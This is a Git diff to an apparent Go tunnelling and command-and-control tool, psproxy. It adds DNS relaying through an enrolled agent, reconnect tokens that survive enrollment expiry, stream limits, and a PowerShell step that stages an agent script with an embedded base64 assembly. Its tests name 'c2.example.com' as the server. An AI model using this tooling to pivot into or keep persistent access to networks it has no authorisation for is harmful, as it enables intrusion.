func (l *localStream) enqueue(payload []byte) bool {
|
||||||
|
buf := append([]byte(nil), payload...)
|
||||||
|
select {
|
||||||
|
case l.ch <- buf:
|
||||||
|
return true
|
||||||
|
case <-l.done:
|
||||||
|
return false
|
||||||
|
default:
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (l *localStream) writeLoop() {
|
||||||
|
defer l.close()
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case payload := <-l.ch:
|
||||||
|
if _, err := l.conn.Write(payload); err != nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
case <-l.done:
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (l *localStream) close() {
|
||||||
|
l.once.Do(func() {
|
||||||
|
close(l.done)
|
||||||
|
_ = l.conn.Close()
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *TunnelServer) Status() map[string]any {
|
||||||
|
a := s.Current()
|
||||||
|
status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams}
|
||||||
|
if a != nil {
|
||||||
|
a.mu.Lock()
|
||||||
|
status["active_streams"] = len(a.locals)
|
||||||
|
status["pending_opens"] = len(a.pending)
|
||||||
|
status["pending_dns"] = len(a.dnsPending)
|
||||||
|
a.mu.Unlock()
|
||||||
|
}
|
||||||
|
return status
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) {
|
||||||
|
a := s.Current()
|
||||||
|
if a == nil {
|
||||||
|
return nil, errors.New("no enrolled agent connected")
|
||||||
|
}
|
||||||
|
id := s.dnsID.Add(1)
|
||||||
|
ch := make(chan []byte, 1)
|
||||||
|
a.mu.Lock()
|
||||||
|
select {
|
||||||
|
case <-a.closed:
|
||||||
|
a.mu.Unlock()
|
||||||
|
return nil, errors.New("agent session closed")
|
||||||
|
default:
|
||||||
|
}
|
||||||
|
a.dnsPending[id] = ch
|
||||||
|
a.mu.Unlock()
|
||||||
|
if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil {
|
||||||
|
a.mu.Lock()
|
||||||
|
delete(a.dnsPending, id)
|
||||||
|
a.mu.Unlock()
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
select {
|
||||||
|
case resp, ok := <-ch:
|
||||||
|
if !ok {
|
||||||
|
return nil, errors.New("agent session closed")
|
||||||
|
}
|
||||||
|
if len(resp) == 0 {
|
||||||
|
return nil, errors.New("empty DNS response from agent")
|
||||||
|
}
|
||||||
|
return resp, nil
|
||||||
|
case <-time.After(5 * time.Second):
|
||||||
|
a.mu.Lock()
|
||||||
|
delete(a.dnsPending, id)
|
||||||
|
a.mu.Unlock()
|
||||||
|
return nil, errors.New("timeout waiting for DNS response")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func statusHandler(server *TunnelServer) http.HandlerFunc {
|
||||||
|
return func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_ = json.NewEncoder(w).Encode(server.Status())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func serveDNSRelay(listenAddr string, server *TunnelServer) {
|
||||||
|
addr, err := net.ResolveUDPAddr("udp", listenAddr)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("dns relay resolve failed: %v", err)
|
||||||
|
}
|
||||||
|
conn, err := net.ListenUDP("udp", addr)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatalf("dns relay listen failed: %v", err)
|
||||||
|
}
|
||||||
|
log.Printf("dns relay listening on udp://%s", listenAddr)
|
||||||
|
buf := make([]byte, 4096)
|
||||||
|
for {
|
||||||
|
n, client, err := conn.ReadFromUDP(buf)
|
||||||
|
if err != nil {
|
||||||
|
log.Printf("dns relay read failed: %v", err)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
query := append([]byte(nil), buf[:n]...)
|
||||||
|
go func() {
|
||||||
|
resp, err := server.QueryDNS(query)
|
||||||
|
if err != nil {
|
||||||
|
log.Printf("dns relay query failed: %v", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
_, _ = conn.WriteToUDP(resp, client)
|
||||||
|
}()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func serveTransparentRelay(listenAddr string, server *TunnelServer) {
|
func serveTransparentRelay(listenAddr string, server *TunnelServer) {
|
||||||
ln, err := net.Listen("tcp4", listenAddr)
|
ln, err := net.Listen("tcp4", listenAddr)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -299,6 +507,15 @@ func originalDst(c net.Conn) (string, error) {
|
|||||||
return target, nil
|
return target, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func validateRoutes(routes []string) error {
|
||||||
|
for _, route := range routes {
|
||||||
|
if _, _, err := net.ParseCIDR(route); err != nil {
|
||||||
|
return fmt.Errorf("invalid --route CIDR %q: %w", route, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
func setupRedirectOrFatal(routes []string, port int) func() {
|
func setupRedirectOrFatal(routes []string, port int) func() {
|
||||||
if os.Geteuid() != 0 {
|
if os.Geteuid() != 0 {
|
||||||
log.Fatal("--redirect requires root so iptables NAT rules can be installed")
|
log.Fatal("--redirect requires root so iptables NAT rules can be installed")
|
||||||
@@ -434,16 +651,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
|
|||||||
_ = conn.Close()
|
_ = conn.Close()
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil {
|
fields := strings.Fields(strings.TrimPrefix(line, prefix))
|
||||||
|
if len(fields) == 0 {
|
||||||
|
_ = conn.Close()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
enrollToken := fields[0]
|
||||||
|
reconnectToken := ""
|
||||||
|
if len(fields) > 1 {
|
||||||
|
reconnectToken = fields[1]
|
||||||
|
}
|
||||||
|
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
|
||||||
log.Printf("agent enrollment failed: %v", err)
|
log.Printf("agent enrollment failed: %v", err)
|
||||||
_ = conn.Close()
|
_ = conn.Close()
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
a := NewAgentSession(conn, br)
|
a := NewAgentSession(conn, br, server.maxStreams)
|
||||||
server.SetSession(a)
|
server.SetSession(a)
|
||||||
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
|
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
|
||||||
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
|
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
|
||||||
a.Run()
|
a.Run()
|
||||||
|
server.ClearSession(a)
|
||||||
}
|
}
|
||||||
|
|
||||||
type singleListener struct {
|
type singleListener struct {
|
||||||
@@ -454,7 +682,6 @@ type singleListener struct {
|
|||||||
|
|
||||||
func (s *singleListener) Accept() (net.Conn, error) {
|
func (s *singleListener) Accept() (net.Conn, error) {
|
||||||
if s.conn == nil {
|
if s.conn == nil {
|
||||||
<-s.done
|
|
||||||
return nil, io.EOF
|
return nil, io.EOF
|
||||||
}
|
}
|
||||||
c := s.conn
|
c := s.conn
|
||||||
|
|||||||
@@ -0,0 +1,126 @@
|
|||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bufio"
|
||||||
|
"net"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/psproxy/psproxy/internal/protocol"
|
||||||
|
"github.com/psproxy/psproxy/internal/staging"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestTunnelServerMaxStreams(t *testing.T) {
|
||||||
|
server := NewTunnelServer(staging.NewStore(time.Minute), 1)
|
||||||
|
agent, peer := net.Pipe()
|
||||||
|
defer peer.Close()
|
||||||
|
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
|
||||||
|
defer sess.Close()
|
||||||
|
server.SetSession(sess)
|
||||||
|
|
||||||
|
local1, remote1 := net.Pipe()
|
||||||
|
defer remote1.Close()
|
||||||
|
defer local1.Close()
|
||||||
|
if err := sess.AttachLocal(1, local1); err != nil {
|
||||||
|
t.Fatalf("first stream should attach: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
local2, remote2 := net.Pipe()
|
||||||
|
defer remote2.Close()
|
||||||
|
defer local2.Close()
|
||||||
|
if err := sess.AttachLocal(2, local2); err == nil {
|
||||||
|
t.Fatal("second stream should be rejected at max stream limit")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLocalStreamBackpressureClosesConnection(t *testing.T) {
|
||||||
|
local, remote := net.Pipe()
|
||||||
|
defer remote.Close()
|
||||||
|
ls := newLocalStream(local)
|
||||||
|
defer ls.close()
|
||||||
|
|
||||||
|
failed := false
|
||||||
|
for i := 0; i < cap(ls.ch)+10; i++ {
|
||||||
|
if !ls.enqueue([]byte("x")) {
|
||||||
|
failed = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !failed {
|
||||||
|
t.Fatal("enqueue should eventually fail when the local write queue is full")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTunnelServerQueryDNS(t *testing.T) {
|
||||||
|
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
|
||||||
|
agent, peer := net.Pipe()
|
||||||
|
defer peer.Close()
|
||||||
|
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
|
||||||
|
defer sess.Close()
|
||||||
|
server.SetSession(sess)
|
||||||
|
go sess.Run()
|
||||||
|
|
||||||
|
go func() {
|
||||||
|
f, err := protocol.ReadFrame(peer)
|
||||||
|
if err != nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")})
|
||||||
|
}()
|
||||||
|
|
||||||
|
resp, err := server.QueryDNS([]byte("dns-query"))
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("dns query failed: %v", err)
|
||||||
|
}
|
||||||
|
if string(resp) != "dns-response" {
|
||||||
|
t.Fatalf("unexpected dns response: %q", resp)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestValidateRoutes(t *testing.T) {
|
||||||
|
if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil {
|
||||||
|
t.Fatalf("valid routes rejected: %v", err)
|
||||||
|
}
|
||||||
|
if err := validateRoutes([]string{"not-a-cidr"}); err == nil {
|
||||||
|
t.Fatal("invalid CIDR should be rejected")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) {
|
||||||
|
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
|
||||||
|
agent, peer := net.Pipe()
|
||||||
|
defer peer.Close()
|
||||||
|
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
|
||||||
|
defer sess.Close()
|
||||||
|
server.SetSession(sess)
|
||||||
|
go sess.Run()
|
||||||
|
|
||||||
|
go func() {
|
||||||
|
f, err := protocol.ReadFrame(peer)
|
||||||
|
if err != nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply})
|
||||||
|
}()
|
||||||
|
|
||||||
|
if _, err := server.QueryDNS([]byte("dns-query")); err == nil {
|
||||||
|
t.Fatal("empty DNS replies should fail")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
|
||||||
|
c1, c2 := net.Pipe()
|
||||||
|
defer c1.Close()
|
||||||
|
defer c2.Close()
|
||||||
|
ln := &singleListener{conn: c1, done: make(chan struct{})}
|
||||||
|
got, err := ln.Accept()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("first accept failed: %v", err)
|
||||||
|
}
|
||||||
|
if got != c1 {
|
||||||
|
t.Fatal("first accept returned unexpected connection")
|
||||||
|
}
|
||||||
|
if _, err := ln.Accept(); err == nil {
|
||||||
|
t.Fatal("second accept should return EOF")
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -16,6 +16,8 @@ const (
|
|||||||
FrameClose byte = 5
|
FrameClose byte = 5
|
||||||
FramePing byte = 6
|
FramePing byte = 6
|
||||||
FramePong byte = 7
|
FramePong byte = 7
|
||||||
|
FrameDNSQuery byte = 8
|
||||||
|
FrameDNSReply byte = 9
|
||||||
|
|
||||||
MaxPayload = 1 << 20
|
MaxPayload = 1 << 20
|
||||||
)
|
)
|
||||||
|
|||||||
+41
-25
@@ -11,25 +11,28 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
type Session struct {
|
type Session struct {
|
||||||
ID string
|
ID string
|
||||||
Server string
|
Server string
|
||||||
Port int
|
Port int
|
||||||
CertPin string
|
CertPin string
|
||||||
EnrollToken string
|
EnrollToken string
|
||||||
ExpiresAt time.Time
|
ReconnectToken string
|
||||||
Delivered bool
|
DNSTarget string
|
||||||
Enrolled bool
|
ExpiresAt time.Time
|
||||||
|
Delivered bool
|
||||||
|
Enrolled bool
|
||||||
}
|
}
|
||||||
|
|
||||||
type Store struct {
|
type Store struct {
|
||||||
mu sync.Mutex
|
mu sync.Mutex
|
||||||
sessions map[string]*Session
|
sessions map[string]*Session
|
||||||
tokens map[string]*Session
|
tokens map[string]*Session
|
||||||
ttl time.Duration
|
reconnects map[string]*Session
|
||||||
|
ttl time.Duration
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewStore(ttl time.Duration) *Store {
|
func NewStore(ttl time.Duration) *Store {
|
||||||
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl}
|
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl}
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewSecret(n int) (string, error) {
|
func NewSecret(n int) (string, error) {
|
||||||
@@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) {
|
|||||||
return base64.RawURLEncoding.EncodeToString(b), nil
|
return base64.RawURLEncoding.EncodeToString(b), nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Store) Create(server string, port int, certPin string) (*Session, error) {
|
func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) {
|
||||||
id, err := NewSecret(18)
|
id, err := NewSecret(18)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
@@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)}
|
reconnect, err := NewSecret(32)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
|
||||||
s.mu.Lock()
|
s.mu.Lock()
|
||||||
defer s.mu.Unlock()
|
defer s.mu.Unlock()
|
||||||
s.sessions[id] = sess
|
s.sessions[id] = sess
|
||||||
s.tokens[tok] = sess
|
s.tokens[tok] = sess
|
||||||
|
s.reconnects[reconnect] = sess
|
||||||
return sess, nil
|
return sess, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
|
|||||||
if time.Now().After(sess.ExpiresAt) {
|
if time.Now().After(sess.ExpiresAt) {
|
||||||
delete(s.sessions, id)
|
delete(s.sessions, id)
|
||||||
delete(s.tokens, sess.EnrollToken)
|
delete(s.tokens, sess.EnrollToken)
|
||||||
|
delete(s.reconnects, sess.ReconnectToken)
|
||||||
return nil, errors.New("enrollment expired")
|
return nil, errors.New("enrollment expired")
|
||||||
}
|
}
|
||||||
if sess.Delivered {
|
if sess.Delivered {
|
||||||
@@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
|
|||||||
return sess, nil
|
return sess, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Store) Enroll(token string) error {
|
func (s *Store) Authenticate(enrollToken, reconnectToken string) error {
|
||||||
s.mu.Lock()
|
s.mu.Lock()
|
||||||
defer s.mu.Unlock()
|
defer s.mu.Unlock()
|
||||||
sess := s.tokens[token]
|
sess := s.reconnects[reconnectToken]
|
||||||
|
if sess != nil && sess.Enrolled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
sess = s.tokens[enrollToken]
|
||||||
if sess == nil {
|
if sess == nil {
|
||||||
return errors.New("invalid enrollment token")
|
return errors.New("invalid enrollment token")
|
||||||
}
|
}
|
||||||
if time.Now().After(sess.ExpiresAt) {
|
if time.Now().After(sess.ExpiresAt) {
|
||||||
delete(s.sessions, sess.ID)
|
delete(s.sessions, sess.ID)
|
||||||
delete(s.tokens, token)
|
delete(s.tokens, enrollToken)
|
||||||
|
delete(s.reconnects, sess.ReconnectToken)
|
||||||
return errors.New("enrollment expired")
|
return errors.New("enrollment expired")
|
||||||
}
|
}
|
||||||
if sess.Enrolled {
|
if sess.Enrolled && sess.ReconnectToken != reconnectToken {
|
||||||
return errors.New("enrollment token already used")
|
return errors.New("enrollment token already used")
|
||||||
}
|
}
|
||||||
sess.Enrolled = true
|
sess.Enrolled = true
|
||||||
@@ -96,11 +110,13 @@ func (s *Store) Enroll(token string) error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
type AgentTemplateData struct {
|
type AgentTemplateData struct {
|
||||||
AssemblyB64 string
|
AssemblyB64 string
|
||||||
Server string
|
Server string
|
||||||
Port int
|
Port int
|
||||||
CertPin string
|
CertPin string
|
||||||
EnrollToken string
|
EnrollToken string
|
||||||
|
ReconnectToken string
|
||||||
|
DNSTarget string
|
||||||
}
|
}
|
||||||
|
|
||||||
func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc {
|
func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc {
|
||||||
@@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
|
|||||||
}
|
}
|
||||||
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
|
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
|
||||||
w.Header().Set("Cache-Control", "no-store")
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken})
|
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,49 @@
|
|||||||
|
package staging
|
||||||
|
|
||||||
|
import (
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) {
|
||||||
|
store := NewStore(time.Minute)
|
||||||
|
sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("create session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
|
||||||
|
t.Fatalf("initial enrollment failed: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
|
||||||
|
t.Fatalf("reconnect failed: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) {
|
||||||
|
store := NewStore(time.Minute)
|
||||||
|
sess, err := store.Create("c2.example.com", 443, "pin", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("create session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
|
||||||
|
t.Fatalf("initial enrollment failed: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil {
|
||||||
|
t.Fatal("reused enrollment token without reconnect token should fail")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) {
|
||||||
|
store := NewStore(50 * time.Millisecond)
|
||||||
|
sess, err := store.Create("c2.example.com", 443, "pin", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("create session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
|
||||||
|
t.Fatalf("initial enrollment failed: %v", err)
|
||||||
|
}
|
||||||
|
time.Sleep(75 * time.Millisecond)
|
||||||
|
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
|
||||||
|
t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__')
|
|||||||
$template = $template.Replace('{{.Port}}', '443')
|
$template = $template.Replace('{{.Port}}', '443')
|
||||||
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
|
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
|
||||||
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
|
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
|
||||||
|
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
|
||||||
|
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
|
||||||
[IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8)
|
[IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8)
|
||||||
Write-Host "Wrote $OutFile"
|
Write-Host "Wrote $OutFile"
|
||||||
Write-Host "Wrote $b64Out"
|
Write-Host "Wrote $b64Out"
|
||||||
|
|||||||
Reference in New Issue
Block a user